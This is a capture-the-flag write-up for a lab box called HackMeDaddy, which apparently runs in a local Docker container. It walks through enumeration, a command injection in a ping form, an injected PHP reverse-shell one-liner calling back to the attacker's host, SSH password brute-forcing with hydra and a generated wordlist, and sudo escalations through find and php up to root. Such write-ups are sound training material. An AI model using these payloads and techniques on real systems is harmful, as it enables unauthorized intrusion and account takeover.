Skip to main content

HackMeDaddy

export TARGET_IP=172.17.0.2
sudo nmap -p0- $TARGET_IP
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Service Enumeration

  • The website's HTML source code reveals the hostname: hackmedaddy.com. This is added to the /etc/hosts file.

    echo "$TARGET_IP   hackmedaddy.com" | sudo tee -a /etc/hosts

  • Directory and file enumeration is performed using gobuster:

    gobuster dir -u http://$TARGET_IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak

    This identifies the following interesting files:

    /info.txt
    /flag.txt

  • Further investigation of robots.txt reveals disallowed entries:

    curl http://hackmedaddy.com/robots.txt
    User-agent: *
    Disallow: /FLAG.txt
    Disallow: /joomla/*
    Disallow: /secret/

  • info.txt contains a message hinting at a removed file named README.txt in the HTML folder:

    Look, I told Eliot to remove those words from the README.txt because it could be a big security flaw in our HTML folder.

  • The main page source code contains a cat README.txt command and the following output:

    d05notfound exploit payload shell bruteforce vulnerability cipher zero-day phishing root port_scan firewall backdoor

    This list of words suggests potential vulnerabilities and attack vectors to consider.

  • Based on the first entry d05notfound in the list, we access http://hackmedaddy.com/d05notfound and find a PHP page at http://hackmedaddy.com/d05notfound/d05notfound.php.

  • The page offers functionality to ping an IP address. The source code must be viewed to see the input form. This is a potential command injection vulnerability.

Exploitation: Command Injection

  • Confirmation

    The ping functionality is vulnerable to command injection. Injecting 192.168.1.100 | ls -al into the input field and viewing the source code reveals the output of the ls -al command, confirming the vulnerability.

  • Reverse Shell

    A reverse shell is established using netcat on the attacking machine and a PHP reverse shell one-liner on the target:

    Attacker machine:

    nc -lvnp 4444

    Target machine (injected command):

    192.168.1.100 | php -r '$sock=fsockopen("172.17.0.1",4444);exec("sh <&3 >&3 2>&3");'

    This grants a shell as the www-data user.

Privilege Escalation: User e1i0t

Information Gathering

  • nota.txt in e1i0t's home directory suggests that passwords have been removed from an "agenda":

    Reminder:

    Delete my passwords from the agenda, I don't want to screw up with the boss again.

    By e1i0t

  • agenda.txt and agenda_passwords.txt are found in e1i0t's documents directory. These likely contain usernames and potential passwords.

Password Cracking

  • agenda.txt is transferred to the attacker's machine using netcat:

    Attacker machine:

    nc -lvnp 4444 > agenda.txt

    Target machine:

    cat /home/e1i0t/documents/agenda.txt

  • hydra is used to brute-force e1i0t's SSH password using agenda.txt as the wordlist:

    hydra -l e1i0t -P agenda.txt ssh://$TARGET_IP

    This successfully identifies the password as eliotelmejor.

User e1i0t Access

The attacker logs in as e1i0t via SSH:

ssh e1i0t@$TARGET_IP # Password: eliotelmejor

Privilege Escalation: User an0n1mat0

Privilege Enumeration

sudo -l reveals that e1i0t can run /bin/find as user an0n1mat0 without a password:

User e1i0t may run the following commands on 8cc0abdb7353:
    (an0n1mat0 : an0n1mat0) NOPASSWD: /bin/find

Exploitation

A shell as an0n1mat0 is obtained using find's -exec option:

sudo -u an0n1mat0 find . -exec /bin/sh \; -quit

Privilege Escalation: Attempting Root

Further Enumeration

  • sudo -l as an0n1mat0 indicates that a password is required for further privilege escalation.

  • nota.txt in an0n1mat0's home directory mentions a "secret folder":

    The boss told me that he will soon remove your privileges to be able to access your secret folder.

  • A directory named /secret is found (find / -name 'secret' 2>/dev/null). confidencial.txt inside it mentions a file called passwords_users.txt in a secure location.

  • passwords_users.txt is found at /usr/local/bin/passwords_users.txt (find / -name 'passwords_users.txt' 2>/dev/null). It contains:

    User passwords:

    e1i0t:eliotelmejor
    an0n1mat0:XXyanonymous
    root:root

    There are some outdated passwords, but I don't remember an0n1mat0's entire password, I know that where the two

Password Generation

The next step is to generate possible password combinations for an0n1mat0 based on XXyanonymous. A Python script is used for this:

password_generation.py
import itertools
import string

base_password = "yanonymous"
prefix = "XX"

# Generate all possible two-character combinations of letters and digits
combinations = [''.join(comb) for comb in itertools.product(string.ascii_lowercase + string.digits, repeat=2)]

# Create a file with the generated passwords
with open("an0n1mat0_passwords.txt", "w") as f:
    for combination in combinations:
        f.write(f"{combination}{base_password}\n")

print("Password list generated: an0n1mat0_passwords.txt")

This creates a file named an0n1mat0_passwords.txt.

Brute-Forcing an0n1mat0's password

hydra -l an0n1mat0 -P an0n1mat0_passwords.txt ssh://$TARGET_IP
[22][ssh] host: 172.17.0.2   login: an0n1mat0   password: soyanonymous

User an0n1mat0 Access

ssh an0n1mat0@$TARGET_IP # Password: soyanonymous
sudo -l
Matching Defaults entries for an0n1mat0 on 8cc0abdb7353:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User an0n1mat0 may run the following commands on 8cc0abdb7353:
    (ALL : ALL) /bin/php

Exploitation

See GTFOBINS

sudo php -r 'system("/bin/sh");'
id # uid=0(root) gid=0(root) groups=0(root)